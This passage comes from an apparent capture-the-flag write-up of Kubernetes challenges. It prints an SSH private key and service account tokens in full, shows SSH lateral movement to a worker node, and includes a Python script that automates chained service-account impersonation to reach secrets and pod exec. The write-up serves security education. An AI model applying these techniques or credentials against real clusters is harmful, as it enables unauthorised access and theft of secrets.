aWw5RkNBWDhWWHJ4TFRpSlVFd2FrUDdVOEFBQURCQUxXWEZDVTgvQ3owOUMvNQpHNzF1WS9PZURNaFIySnJVUmhQdHlwQmUxcEtvOHQrUk0rSUcyVWdjR245NlF0cDEzcjlWdWNZcVZ4TUR4dlg4eDNRdzEvCnpEN0E4M0pMWW9ac1U2Y2g2QWRMa0FVaE9CbDB4YVdkUWZqVStkR2syZmJ0M1BqTUVaVExGSDJuOW15MkdEcGVPVi9tbDgKT29OQkpqUmlYSVBWVm91a0VMek1qS0VGUWt6aEZHcmowTFVLNmwva2hxUVllQkJNd0NzZ0l2Q0hrSzFCSHJXekFJajJuQwpxc1c3bzBNQWk4UW5EdUZzVzNld1AxZEpjNmxaL01md0FBQU1FQThBUnIzMUE2a2hyQVQzRUZUV3QxaG5VOWVVR1RhSTJUCm96OGEvc2h2Q2xMZm9xekFjVEhndGtTaXNJK3UyNFBFbFU2YTB6YXFTY0s0c3dTVmVUU2p1bTV0akVudGdBc3UyTWZESkgKdDZaRWJ4VEpZRmMxQjd1ZDRtckdQcjdkdFJZZkhRcS9WOXE2T281Mmd3UFFycWljclRBdUdtaUZ2dzFNWmoxcWxBeGgyYQpGOE4yOUFXbVZKVXp3Z05BWjNPMEp5My9mYk5WQU1LZkFBZnkxSmVQd05vSTF5OVR0Y21MOWczZE1aWDhaSlhDZE9vdmMxCm1reWREMyttNWNTVFBoQUFBQUkybGhhVzVBZEdsdWRHRm5iR2xoTG5kdmNtc3VjMjFoY25SNVltOTVMbTVwYm1waEFRSUQKQkFVR0J3PT0KLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==
username    backup

root@entrypoint-deployment-776cc5bd94-nncdz:~# base64 -d <<< LS0tL[..SNIP..]
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAqkDFw8awPS018+Zf//sSYYIyxhTcGeLmv7Yjim2W7RYL81HA+hvY
PiZBUr0d/DYPlnzFO50Z33LCThhJBftDjZr7B/7xVwywp7F3/WxNKU1dyKF6frOqS7uoRo
5l3PwopebavMKFY8LYsSaf63Wn0uZqXfX0bevZxkRlYLnKVsp9IYbYJed2B7S5MndnbI8j
CXhdZUuBX42Nqoptm0lYj44lR+RsD1TpGQKOReGQ33EqOTf7NotNcVPibZkprYq+16GBMH
mxEs8Lv8Qcuu37VuVVNIfEW7cYjcc7lAz9AhYEGW9ajyyidS0ADmHa45NKrq4o4CJJGLiZ
K22SpiXqKLMWF3gttAZMZTU+dbspvsex8ejLRbw6hoxCacx4Z3Udpbp8PzALhrUT7dKgAB
6nlpgc4z2imY1YoB0DyxoAAZqoT1l7FH+SnAWxITW+/Nwdu2SafQjZD0lpkAjhydqaloTS
FVnKihsVSofDXT8mxfPCRRhJqZwdT/n6ku1LZwifAAAFoHd9cI53fXCOAAAAB3NzaC1yc2
EAAAGBAKpAxcPGsD0tNfPmX//7EmGCMsYU3Bni5r+2I4ptlu0WC/NRwPob2D4mQVK9Hfw2
D5Z8xTudGd9ywk4YSQX7Q42a+wf+8VcMsKexd/1sTSlNXcihen6zqku7qEaOZdz8KKXm2r
zChWPC2LEmn+t1p9Lmal319G3r2cZEZWC5ylbKfSGG2CXndge0uTJ3Z2yPIwl4XWVLgV+N
jaqKbZtJWI+OJUfkbA9U6RkCjkXhkN9xKjk3+zaLTXFT4m2ZKa2KvtehgTB5sRLPC7/EHL
rt+1blVTSHxFu3GI3HO5QM/QIWBBlvWo8sonUtAA5h2uOTSq6uKOAiSRi4mSttkqYl6iiz
Fhd4LbQGTGU1PnW7Kb7HsfHoy0W8OoaMQmnMeGd1HaW6fD8wC4a1E+3SoAAep5aYHOM9op
mNWKAdA8saAAGaqE9ZexR/kpwFsSE1vvzcHbtkmn0I2Q9JaZAI4cnampaE0hVZyoobFUqH
w10/JsXzwkUYSamcHU/5+pLtS2cInwAAAAMBAAEAAAGANyLS6RwnZyiFGH+7B0NgKIPpvY
xz205IPD3YNLRY9F73b81CGb16wmXRMeJdG5jGY430seGmx1563p+uxmkg73MJaQV/Uxmg
/C3VFhVEx+NuQ9NHwFCfDfev/2mOQ4rF/zRMEmVMnYo0cup3T+HCf+JvAA7vIcoHtNXhnv
mMNZ9N9tWcmmnjJ4u3jkhtDhMs3ZxFYtCZDUDiaCB8bpXKQHNgT3ACLtToyFizip4KNNKJ
Qg6HJJrocZMg+S1o+fK8Yr7fEkJ7OzP0Jbr+b3+Vl9XOBfBry++PciB5Swy539wjwzsUSM
Ysuoxb+3Ws5j+kmtwkCuX9PTiiWkKBA1wOaGOwptTX6l+bIde9WtnjOvpE1KRR1Mk9UeGY
7qW8S9HA/Y04FgT+/XFxhMgBLDdlyMtHfS/plvX/x8tDK+yocoprTKCCOpylj6dx7eytEs
Q0tdT/Eq0qfSJ+yzyh1caBQSU3PQqzHKRNugP+mc+wY5O9qGMquf/JKalYi8B+2voBAAAA
wQCQsX2wXpqLKu9TkGZ2Tj4Wk0EMWBRfGQPnO1iQmLOfafEL5mrzQejXYR1QTpP7TDmrfz
Yq1zGxlVFmYrVr/UCrTM45FHnosfLBmUkYHtQdgHxxLm0K+WrUuUoAQlvYrbPyhAeHgVB2
xX+Gqkd9e9t4Kv2Z214CcJjUlAwe/gtmYD7BMFOo+10Q1lZZ0pBnP39T1KUYdU4SIxpPzE
9F7SBmBNCBpaC/PJIJE4ootfil9FCAX8VXrxLTiJUEwakP7U8AAADBALWXFCU8/Cz09C/5
G71uY/OeDMhR2JrURhPtypBe1pKo8t+RM+IG2UgcGn96Qtp13r9VucYqVxMDxvX8x3Qw1/
zD7A83JLYoZsU6ch6AdLkAUhOBl0xaWdQfjU+dGk2fbt3PjMEZTLFH2n9my2GDpeOV/ml8
OoNBJjRiXIPVVoukELzMjKEFQkzhFGrj0LUK6l/khqQYeBBMwCsgIvCHkK1BHrWzAIj2nC
qsW7o0MAi8QnDuFsW3ewP1dJc6lZ/MfwAAAMEA8ARr31A6khrAT3EFTWt1hnU9eUGTaI2T
oz8a/shvClLfoqzAcTHgtkSisI+u24PElU6a0zaqScK4swSVeTSjum5tjEntgAsu2MfDJH
t6ZEbxTJYFc1B7ud4mrGPr7dtRYfHQq/V9q6Oo52gwPQrqicrTAuGmiFvw1MZj1qlAxh2a
F8N29AWmVJUzwgNAZ3O0Jy3/fbNVAMKfAAfy1JePwNoI1y9TtcmL9g3dMZX8ZJXCdOovc1
mkydD3+m5cSTPhAAAAI2lhaW5AdGludGFnbGlhLndvcmsuc21hcnR5Ym95Lm5pbmphAQID
BAUGBw==
-----END OPENSSH PRIVATE KEY-----

Excellent, we have the key and the username for it - backup. Let’s try logging into the nodes and find the final flag.

root@entrypoint-deployment-776cc5bd94-nncdz:~# base64 -d <<< LS0t[..SNIP..] > privkey
root@entrypoint-deployment-776cc5bd94-nncdz:~# chmod 600 privkey
root@entrypoint-deployment-776cc5bd94-nncdz:~# kubectl get node  -o wide
NAME       STATUS   ROLES           AGE   VERSION    INTERNAL-IP    EXTERNAL-IP   OS-IMAGE             KERNEL-VERSION   CONTAINER-RUNTIME
master-1   Ready    control-plane   38m   v1.28.11   10.0.252.74    <none>        Ubuntu 22.04.4 LTS   6.2.0-1015-aws   containerd://1.7.7
node-1     Ready    <none>          38m   v1.28.11   10.0.234.227   <none>        Ubuntu 22.04.4 LTS   6.2.0-1015-aws   containerd://1.7.7
node-2     Ready    <none>          38m   v1.28.11   10.0.194.36    <none>        Ubuntu 22.04.4 LTS   6.2.0-1015-aws   containerd://1.7.7
root@entrypoint-deployment-776cc5bd94-nncdz:~# ssh backup@10.0.252.74 -i privkey
The authenticity of host '10.0.252.74 (10.0.252.74)' can't be established.
ED25519 key fingerprint is SHA256:XeLpf01sJIW9cMRtmIV7y5Q/7ly3mmZ7n7eYyzYeUlc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.252.74' (ED25519) to the list of known hosts.
backup@10.0.252.74: Permission denied (publickey).
root@entrypoint-deployment-776cc5bd94-nncdz:~# ssh backup@10.0.234.227 -i privkey
The authenticity of host '10.0.234.227 (10.0.234.227)' can't be established.
ED25519 key fingerprint is SHA256:y5D1c6wo9z9DbPtedHIQGOsQH42RoTyrcO1+bgyOTCU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.234.227' (ED25519) to the list of known hosts.
                 _            _
 _ __   ___   __| | ___      / |
| '_ \ / _ \ / _` |/ _ \_____| |
| | | | (_) | (_| |  __/_____| |
|_| |_|\___/ \__,_|\___|     |_|


backup@node-1:~$

OK, so we couldn’t SSH into the master node, but we could get into the worker. Let’s see if we can find the flag somewhere within:

backup@node-1:~$ ls -alp
total 24
drwxr-xr-x 3 backup backup 4096 Jun 27 15:18 ./
drwxr-xr-x 5 root   root   4096 Jun 27 15:18 ../
-rw-r--r-- 1 backup backup  220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 backup backup 3771 Jan  6  2022 .bashrc
-rw-r--r-- 1 backup backup  807 Jan  6  2022 .profile
drwx------ 2 backup backup 4096 Jun 27 15:18 .ssh/
backup@node-1:~$ ls -ap^C
backup@node-1:~$ cd .ssh/
backup@node-1:~/.ssh$ ls
authorized_keys
backup@node-1:~/.ssh$ ls -alp
total 12
drwx------ 2 backup backup 4096 Jun 27 15:18 ./
drwxr-xr-x 3 backup backup 4096 Jun 27 15:18 ../
-rw------- 1 backup backup  589 Jun 27 15:18 authorized_keys
backup@node-1:~/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCqQMXDxrA9LTXz5l//+xJhgjLGFNwZ4ua/tiOKbZbtFgvzUcD6G9g+JkFSvR38Ng+WfMU7nRnfcsJOGEkF+0ONmvsH/vFXDLCnsXf9bE0pTV3IoXp+s6pLu6hGjmXc/Cil5tq8woVjwtixJp/rdafS5mpd9fRt69nGRGVgucpWyn0hhtgl53YHtLkyd2dsjyMJeF1lS4FfjY2qim2bSViPjiVH5GwPVOkZAo5F4ZDfcSo5N/s2i01xU+JtmSmtir7XoYEwebESzwu/xBy67ftW5VU0h8RbtxiNxzuUDP0CFgQZb1qPLKJ1LQAOYdrjk0qurijgIkkYuJkrbZKmJeoosxYXeC20BkxlNT51uym+x7Hx6MtFvDqGjEJpzHhndR2lunw/MAuGtRPt0qAAHqeWmBzjPaKZjVigHQPLGgABmqhPWXsUf5KcBbEhNb783B27ZJp9CNkPSWmQCOHJ2pqWhNIVWcqKGxVKh8NdPybF88JFGEmpnB1P+fqS7UtnCJ8= iain@tintaglia.work.smartyboy.ninja
backup@node-1:~/.ssh$ cd /
backup@node-1:/$ grep -ri flag_ctf
grep: lost+found: Permission denied
grep: home/player: Permission denied
grep: home/ubuntu: Permission denied
etc/passwd:flag_ctf{well_done_for_using_these_keys}

There we go, there’s the final flag. Not often you see challenges that make this sort of use of Vault.

Challenge 3 - Labyrinth

Moving on to the final challenge

88888888888888888888888888888888888888888888888888888888888888888888888
88.._|      | `-.  | `.  -_-_ _-_  _-  _- -_ -  .'|   |.'|     |  _..88
88   `-.._  |    |`!  |`.  -_ -__ -_ _- _-_-  .'  |.;'   |   _.!-'|  88
88      | `-!._  |  `;!  ;. _______________ ,'| .-' |   _!.i'     |  88
88..__  |     |`-!._ | `.| |_______________||."'|  _!.;'   |     _|..88
88   |``"..__ |    |`";.| i|_|MMMMMMMMMMM|_|'| _!-|   |   _|..-|'    88
88   |      |``--..|_ | `;!|l|MMoMMMMoMMM|1|.'j   |_..!-'|     |     88
88   |      |    |   |`-,!_|_|MMMMP'YMMMM|_||.!-;'  |    |     |     88
88___|______|____!.,.!,.!,!|d|MMMo * loMM|p|,!,.!.,.!..__|_____|_____88
88      |     |    |  |  | |_|MMMMb,dMMMM|_|| |   |   |    |      |  88
88      |     |    |..!-;'i|r|MPYMoMMMMoM|r| |`-..|   |    |      |  88
88      |    _!.-j'  | _!,"|_|M<>MMMMoMMM|_||!._|  `i-!.._ |      |  88
88     _!.-'|    | _."|  !;|1|MbdMMoMMMMM|l|`.| `-._|    |``-.._  |  88
88..-i'     |  _.''|  !-| !|_|MMMoMMMMoMM|_|.|`-. | ``._ |     |``"..88
88   |      |.|    |.|  !| |u|MoMMMMoMMMM|n||`. |`!   | `".    |     88
88   |  _.-'  |  .'  |.' |/|_|MMMMoMMMMoM|_|! |`!  `,.|    |-._|     88
88  _!"'|     !.'|  .'| .'|[@]MMMMMMMMMMM[@] \|  `. | `._  |   `-._  88
88-'    |   .'   |.|  |/| /                 \|`.  |`!    |.|      |`-88
88      |_.'|   .' | .' |/                   \  \ |  `.  | `._    |  88
88     .'   | .'   |/|  /                     \ |`!   |`.|    `.  |  88
88  _.'     !'|   .' | /                       \|  `  |  `.    |`.|  88
88888888888888888888888888888888888888888888888888888888888888888888888

You've told us before that our challenges involve a lot of rinse-and-repeat RBAC. To prove that the other challenges aren't "just this", we've made this cluster just for you, dear player. Welcome to the labyrinth.

You have access to a service account. That service account can do some "things". You need to do those things over, and over, and over, and over, and over, and over. Eventually you'll be able to get secrets. Good luck, have fun.

This challenge will probably require some automation. If you want to work locally, you can make the Kubernetes API accessible on your local host by running `ssh -F simulator_config -L 8443:127.0.0.1:8443 bastion`

Here's a token to get you started.
eyJhbGciOiJSUzI1NiIsImtpZCI6Ii1sMHcxM2cwR09hTm1fWG9QNUlHTkVQN0Y5WHNaQm1aci14UC1ycWkzTEEifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzUxMDM4NDk5LCJpYXQiOjE3MTk1MDI0OTksImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJlbnRyeXBvaW50IiwidWlkIjoiYTFkNjIwZDktZTZiYy00MGY5LWFhYTctM2IzNDQ0M2M1OTdiIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJlbnRyeXBvaW50IiwidWlkIjoiYmFlMDJlN2ItMDAzMC00OTg4LTlmNGYtZjgzZTY2ZDY2NzEwIn0sIndhcm5hZnRlciI6MTcxOTUwNjEwNn0sIm5iZiI6MTcxOTUwMjQ5OSwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6ZW50cnlwb2ludCJ9.jdvVrObbj-M29qD0gTY6vEbxlfqht1-hrLNTQ18rlEVGvriOrfshblJk2yWRt6gg0KUjZMyOX08l8LO2Q3qdUgfZ-9CVVKClH5xEghSdqWPYhVfzJjrNUexE67Gbcyipic1HRmidGsy3YQoh-IzK0pNp9wy0fWRX24oZnrwzP97kYkP8ahZ2FYl4-WtklXvwWo6sUJVD9ubzEu4pIt1R5ZhN3xqMJLO9btNVHQ24GtXvYrrWzu27M3qH55rZxf9e4eiP9uwSd91pTPTiQlgZWxsKHIr73hu3fN4tQHOQNty91aKatvWD-0CcONcIcxm7jnQmc7veYN0tf9i3u0iwhA

Interesting, this is a concept I had been discussing with Iain beforehand when we have been discussing ideas for future challenges. So I have an inkling of what might need doing here, wouldn’t be surprised if he’s made a few tweaks from what I expect though. Let’s have an initial foray, of our permissions:

root@entrypoint:~# kubectl get -A secret
Error from server (Forbidden): secrets is forbidden: User "system:serviceaccount:default:entrypoint" cannot list resource "secrets" in API group "" at the cluster scope
root@entrypoint:~# kubectl auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
serviceaccounts/token                           []                                     [entrypoint]     [create]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
serviceaccounts                                 []                                     [alvenakirlin]   [impersonate]

Right, so we are currently the entrypoint account, and we can impersonate the alvenakirlin account. We can also create a token for ourselves, the token in the original message looks to also be for the entrypoint account.

root@entrypoint:~# kubectl --token eyJhbGciOiJSUzI1NiIsImtpZCI6Ii1sMHcxM2cwR09hTm1fWG9QNUlHTkVQN0Y5WHNaQm1aci14UC1ycWkzTEEifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzUxMDM4NDk5LCJpYXQiOjE3MTk1MDI0OTksImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJlbnRyeXBvaW50IiwidWlkIjoiYTFkNjIwZDktZTZiYy00MGY5LWFhYTctM2IzNDQ0M2M1OTdiIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJlbnRyeXBvaW50IiwidWlkIjoiYmFlMDJlN2ItMDAzMC00OTg4LTlmNGYtZjgzZTY2ZDY2NzEwIn0sIndhcm5hZnRlciI6MTcxOTUwNjEwNn0sIm5iZiI6MTcxOTUwMjQ5OSwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6ZW50cnlwb2ludCJ9.jdvVrObbj-M29qD0gTY6vEbxlfqht1-hrLNTQ18rlEVGvriOrfshblJk2yWRt6gg0KUjZMyOX08l8LO2Q3qdUgfZ-9CVVKClH5xEghSdqWPYhVfzJjrNUexE67Gbcyipic1HRmidGsy3YQoh-IzK0pNp9wy0fWRX24oZnrwzP97kYkP8ahZ2FYl4-WtklXvwWo6sUJVD9ubzEu4pIt1R5ZhN3xqMJLO9btNVHQ24GtXvYrrWzu27M3qH55rZxf9e4eiP9uwSd91pTPTiQlgZWxsKHIr73hu3fN4tQHOQNty91aKatvWD-0CcONcIcxm7jnQmc7veYN0tf9i3u0iwhA get -A secret
Error from server (Forbidden): secrets is forbidden: User "system:serviceaccount:default:entrypoint" cannot list resource "secrets" in API group "" at the cluster scope**

Let’s impersonate alvenakirlin and see what it can do.

root@entrypoint:~# kubectl --as system:serviceaccount:default:alvenakirlin auth can-i --list
The connection to the server localhost:8080 was refused - did you specify the right host or port?

Of course… gotta love kubectl quirks. Let’s specify the server, user, etc to the binary.

root@entrypoint:~# env
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
HOSTNAME=entrypoint
PWD=/root
HOME=/root
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
TERM=xterm
SHLVL=1
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
root@entrypoint:~# kubectl --server https://10.96.0.1 --insecure-skip-tls-verify --token $(kubectl create token entrypoint) --as system:serviceaccount:default:alvenakirlin auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
serviceaccounts/token                           []                                     [alvenakirlin]   [create]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
serviceaccounts                                 []                                     [clarebartell]   [impersonate]
serviceaccounts                                 []                                     [michealblock]   [impersonate]

Right, so the alvenakirlin can impersonate two more accounts - clarebartell and michealblock. This is going to be a branching out exercise isn’t it. I can see why this needs to be automated, I can see why they say you should automate this. Let’s setup the SSH port forward as documented in the introductory message, and code something up to automate this to some extent.

At the moment, it seems as the lateral movement technique is just to impersonate another service account. I wouldn’t be surprised if this changed down the line to reading a secret or something, so we will need it to be flexible a bit.

After some time, I came up with the following code - I’ve also added some comments to describe what I was doing with specific bits:

import subprocess
from pathlib import Path
import re

# The initial token
tokens = {
    "entrypoint": "eyJhbGciOiJSUzI1NiIsImtpZCI6Ii1sMHcxM2cwR09hTm1fWG9QNUlHTkVQN0Y5WHNaQm1aci14UC1ycWkzTEEifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzUxMDQxNDA3LCJpYXQiOjE3MTk1MDU0MDcsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJlbnRyeXBvaW50IiwidWlkIjoiYTFkNjIwZDktZTZiYy00MGY5LWFhYTctM2IzNDQ0M2M1OTdiIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJlbnRyeXBvaW50IiwidWlkIjoiYmFlMDJlN2ItMDAzMC00OTg4LTlmNGYtZjgzZTY2ZDY2NzEwIn0sIndhcm5hZnRlciI6MTcxOTUwOTAxNH0sIm5iZiI6MTcxOTUwNTQwNywic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6ZW50cnlwb2ludCJ9.d5LXMdKhcmyDXujZbCWA5A31Ail-L2GMVK4tNKvRkD_i57hymeKkT1YThCkjzVrznblp_qNo-tiI416NOzy3qS-QNb46UzjsAgcwDmWa5jT-iJIaiaTEa6MM-pTWS_pzEyhs_31Ti5mhiLbqgKcEwQzsvs7ukae0j1ubJHbDJM3Ho71zylo2zW75UBIvN0DsllNT-OYSJTVMrOgzxeV95Zzc7L3oiHzN_Fj3TQEkN54Aph3__VX9hG8BhyaFqFiUsiJGmsYaNc9aqtbsb1bcJZcUrdVRif93Fk8hjtYPvR5m1Q9VfZmLvR1-RuNE42bFT1MKtC5OLNAMD_v5ErLSQg"
}

# A mapping of who can impersonate what, empty string was just there as a placeholder as we start with entrypoint
impersonate_mapping = {"entrypoint": ""}

# The list of accounts the script still needs to enumerate
todo = ["entrypoint"]

# Places on filesystem to store permissions and tokens
accounts = Path("accounts")
tokens_path = Path("tokens")

# A generic run command as user, so we can pass different commands as needed
def run_command(final_command, user):
	# if we dont have a token for the user, set the command up to authenticate to a user that can impersonate the target user
    if user not in tokens:
        impersonate = user
        user = impersonate_mapping[user]
    else:
        impersonate = ""

    command = [
        "kubectl",
        "-s",
        "https://localhost:8443",
        "--insecure-skip-tls-verify",
        "--token",
        get_token(user),
    ]
    if impersonate:
        command += [
            "--as",
            f"system:serviceaccount:default:{impersonate}",
        ]
    command += final_command

    return subprocess.run(command, capture_output=True, text=True).stdout

# I don't know why I didn't have this save to tokens directly instead of having get_tokens do it _shrugs_
def create_token(user):
    return run_command(
        ["create", "token", user],
        user,
    )


def get_token(user):
    if user in tokens:
        return tokens[user]

    if user in impersonate_mapping:
        token = create_token(user)
        tokens[user] = token

		# Save all tokens to the filesystem so we can hop in wherever we need to later
        with open(tokens_path / user, "w") as f:
            f.write(token)

        return token


def auth_can_i(user):
    command = [
        "auth",
        "can-i",
        "--list",
    ]

    return run_command(command, user)

# this was meant to have multiple regexes for the different potential lateral movement techniques we might have to use
# but we didn't end up needing that
def check_permissions(user):
	# A simple regex to find permissions where we can assume other accounts, and pulls out which accounts
    impersonate_regex = re.compile(r"serviceaccounts +\[\] +\[(.*)\] +\[impersonate\]")

    permissions = auth_can_i(user)

	# save the permissions so we can search for other permissions we might care about to code in later
    with open(accounts / user, "w") as f:
        f.write(permissions)

    for line in permissions.split("\n"):
        match = re.match(impersonate_regex, line)
        if match:
            new_user = match.group(1)
            # turns out some service accounts could impersonate all other service accounts xD
            # I decided to ignore these for now as I didn't have a way to enumerate them, so to get a service account
            # we would have needed an impersonate path in the first place - so this isn't needed as much, but broke other things
            if new_user == "":
                continue
            # the same accounts were seen multiple times
            if new_user in tokens:
                continue
            # saves the needed impersonate path and token, then adds the new account to the enumerate todo list
            impersonate_mapping[new_user] = user
            get_token(new_user)
            todo.append(new_user)

# impersonate the todo list until we run out
while todo:
    user = todo.pop()
    check_permissions(user)

After this had run, we had a folder full of permissions, and a folder full of tokens. Let’s see if there are any permissions that seem like they may be useful for next steps:

$ cat *  | grep -v "^ " | grep -v Resources | grep -v "^selfsubject" | grep -v serviceaccounts | sort -u
pods/exec                                       []                                     [nothingtoseehere]   [create get]
pods                                            []                                     [nothingtoseehere]   [create get]
secrets                                         []                                     []                [get list]

Looks like we have 3 permissions we might care about. We have one for listing secrets, based of the initial description that is likely to be a flag.

We also have the ability to exec into nothingtoseehere. Considering this challenge has 2 flags, this is likely going to be the path to our second flag.

Let’s start by looking at secrets:

$ grep -rH secrets .
./jaylinbrown:secrets                                         []                                     []                [get list]

Cool, so the jaylinbrown service account has permissions to list secrets. Let’s grab its token and retrieve the secrets.

$ kubectl -s https://localhost:8443 --insecure-skip-tls-verify --token $(cat tokens/jaylinbrown) get secrets
NAME   TYPE     DATA   AGE
flag   Opaque   1      94m
$ kubectl -s https://localhost:8443 --insecure-skip-tls-verify --token $(cat tokens/jaylinbrown) get secrets -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: ZmxhZ3tDb25ncmF0dWxhdGlvbnNfeW91X2F2b2lkZWRfb3VyX3RyYXBzfQ==
  kind: Secret
  metadata:
    creationTimestamp: "2024-06-27T15:34:50Z"
    name: flag
    namespace: default
    resourceVersion: "1483"
    uid: e456b35f-e2fa-4fed-b49e-f5b35464d4f1
  type: Opaque
kind: List
metadata:
  resourceVersion: ""
$ base64 -d <<< ZmxhZ3tDb25ncmF0dWxhdGlvbnNfeW91X2F2b2lkZWRfb3VyX3RyYXBzfQ==
flag{Congratulations_you_avoided_our_traps}

Excellent, we have our first flag. Let’s do a similar thing for pods:

$ grep -rH pods .
./destinirau:pods/exec                                       []                                     [nothingtoseehere]   [create get]
./destinirau:pods                                            []                                     [nothingtoseehere]   [create get]
$ kubectl -s https://localhost:8443 --insecure-skip-tls-verify --token $(cat tokens/destinirau) get pod nothingtoseehere
NAME               READY   STATUS    RESTARTS   AGE
nothingtoseehere   1/1     Running   0          96m
$ kubectl -s https://localhost:8443 --insecure-skip-tls-verify --token $(cat tokens/destinirau) get pod nothingtoseehere -o yaml
apiVersion: v1
kind: Pod
metadata:
  annotations:
    cni.projectcalico.org/containerID: 4bb7ca9d4358a7052ff8c3740e070def06d2d0527a8dd2d146dfc97ab9dc49a3
    cni.projectcalico.org/podIP: 192.168.84.129/32
    cni.projectcalico.org/podIPs: 192.168.84.129/32
  creationTimestamp: "2024-06-27T15:34:54Z"
  labels:
    run: nothingtoseehere
  name: nothingtoseehere
  namespace: default
  resourceVersion: "1682"
  uid: 123a99e6-3011-4707-8b8e-475f3567ff25
spec:
  containers:
  - env:
    - name: FLAG
      valueFrom:
        configMapKeyRef:
          key: flag2
          name: second-flag
    image: nginx
    imagePullPolicy: Always
    name: nothingtoseehere
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-5pbbm
      readOnly: true
[..SNIP..]

Of note in this pod specification, it looks like a flag is mounted in as an environment variable from a config map. We should be able to run env within the container and retrieve it:

$ kubectl -s https://localhost:8443 --insecure-skip-tls-verify --token $(cat tokens/destinirau) exec -ti nothingtoseehere -- sh
# env
[..SNIP..]
FLAG=flag_ctf{You_found_the_sneaky_extra_permissions}

Exellent, that’s our second flag and the completion of this CTF!

Conclusions

As always, this was a super fun CTF by ControlPlane. One comment might be there is less of a storyline in the challenges than there has been in previous, with these being a lot more direct to the punchline. I think my favourite from this one was the Labyrinth, but that’s moreso because I generally like automating things so it did align with overall interests. It’s also a kick to make a tool I’ve been planning to make for quite a while that would have definitely helped with the third challenge.

With a max of 301 points, the scoreboard from the CTF can be seen below - congrats juno:

Scoreboard